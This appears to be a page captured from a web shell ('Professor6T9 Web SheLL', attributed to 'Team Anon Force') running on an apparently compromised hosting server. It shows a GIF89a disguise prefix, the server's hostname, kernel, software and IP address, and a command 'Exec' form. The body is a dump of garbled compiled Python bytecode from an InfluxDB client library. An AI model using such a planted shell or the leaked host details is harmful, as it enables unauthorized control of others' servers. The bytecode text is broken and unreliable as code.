GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
opt
/
alt
/
python38
/
lib
/
python3.8
/
site-packages
/
influxdb_client
/
domain
/
__pycache__
[ HOME ]
Exec
Submit
File Name : replication_update_request.cpython-38.pyc
U ܒi�$ � @ s( d Z ddlZddlZG dd� de�ZdS )a InfluxDB OSS API Service. The InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501 OpenAPI spec version: 2.0.0 Generated by: https://openapi-generator.tech � Nc @ s> e Zd ZdZddddddddd�Zdddd d ddd d�Zd3dd�Zedd� �Zej dd� �Zedd� �Z e j dd� �Z edd� �Zej dd� �Zedd� �Zej dd� �Zedd� �Z e j dd� �Z ed d!� �Zej d"d!� �Zed#d$� �Zej d%d$� �Zed&d'� �Zej d(d'� �Zd)d*� Zd+d,� Zd-d.� Zd/d0� Zd1d2� ZdS )4�ReplicationUpdateRequestz�NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. �str�int�bool)�name�description� remote_id�remote_bucket_id�remote_bucket_name�max_queue_size_bytes�drop_non_retryable_data�max_age_secondsr r ZremoteIDZremoteBucketIDZremoteBucketNameZmaxQueueSizeBytesZdropNonRetryableDataZ maxAgeSecondsNc C s� d| _ d| _d| _d| _d| _d| _d| _d| _d| _|dk rD|| _ |dk rR|| _ |dk r`|| _|dk rn|| _|dk r||| _ |dk r�|| _|dk r�|| _|dk r�|| _dS )z6ReplicationUpdateRequest - a model defined in OpenAPI.N)�_name�_description� _remote_id�_remote_bucket_id�_remote_bucket_name�_max_queue_size_bytes�_drop_non_retryable_data�_max_age_secondsZ discriminatorr r r r r r r r ) �selfr r r r r r r r � r �b/opt/alt/python38/lib/python3.8/site-packages/influxdb_client/domain/replication_update_request.py�__init__6 s2 z!ReplicationUpdateRequest.__init__c C s | j S )z�Get the name of this ReplicationUpdateRequest. :return: The name of this ReplicationUpdateRequest. :rtype: str �r �r r r r r S s zReplicationUpdateRequest.namec C s || _ dS )z�Set the name of this ReplicationUpdateRequest. :param name: The name of this ReplicationUpdateRequest. :type: str Nr )r r r r r r \ s c C s | j S )z�Get the description of this ReplicationUpdateRequest. :return: The description of this ReplicationUpdateRequest. :rtype: str �r r r r r r e s z$ReplicationUpdateRequest.descriptionc C s || _ dS )z�Set the description of this ReplicationUpdateRequest. :param description: The description of this ReplicationUpdateRequest. :type: str Nr )r r r r r r n s c C s | j S )z�Get the remote_id of this ReplicationUpdateRequest. :return: The remote_id of this ReplicationUpdateRequest. :rtype: str �r r r r r r w s z"ReplicationUpdateRequest.remote_idc C s || _ dS )z�Set the remote_id of this ReplicationUpdateRequest. :param remote_id: The remote_id of this ReplicationUpdateRequest. :type: str Nr )r r r r r r � s c C s | j S )z�Get the remote_bucket_id of this ReplicationUpdateRequest. :return: The remote_bucket_id of this ReplicationUpdateRequest. :rtype: str �r r r r r r � s z)ReplicationUpdateRequest.remote_bucket_idc C s || _ dS )z�Set the remote_bucket_id of this ReplicationUpdateRequest. :param remote_bucket_id: The remote_bucket_id of this ReplicationUpdateRequest. :type: str Nr )r r r r r r � s c C s | j S )z�Get the remote_bucket_name of this ReplicationUpdateRequest. :return: The remote_bucket_name of this ReplicationUpdateRequest. :rtype: str �r r r r r r � s z+ReplicationUpdateRequest.remote_bucket_namec C s || _ dS )z�Set the remote_bucket_name of this ReplicationUpdateRequest. :param remote_bucket_name: The remote_bucket_name of this ReplicationUpdateRequest. :type: str Nr )r r r r r r � s c C s | j S )z�Get the max_queue_size_bytes of this ReplicationUpdateRequest. :return: The max_queue_size_bytes of this ReplicationUpdateRequest. :rtype: int )r r r r r r � s z-ReplicationUpdateRequest.max_queue_size_bytesc C s"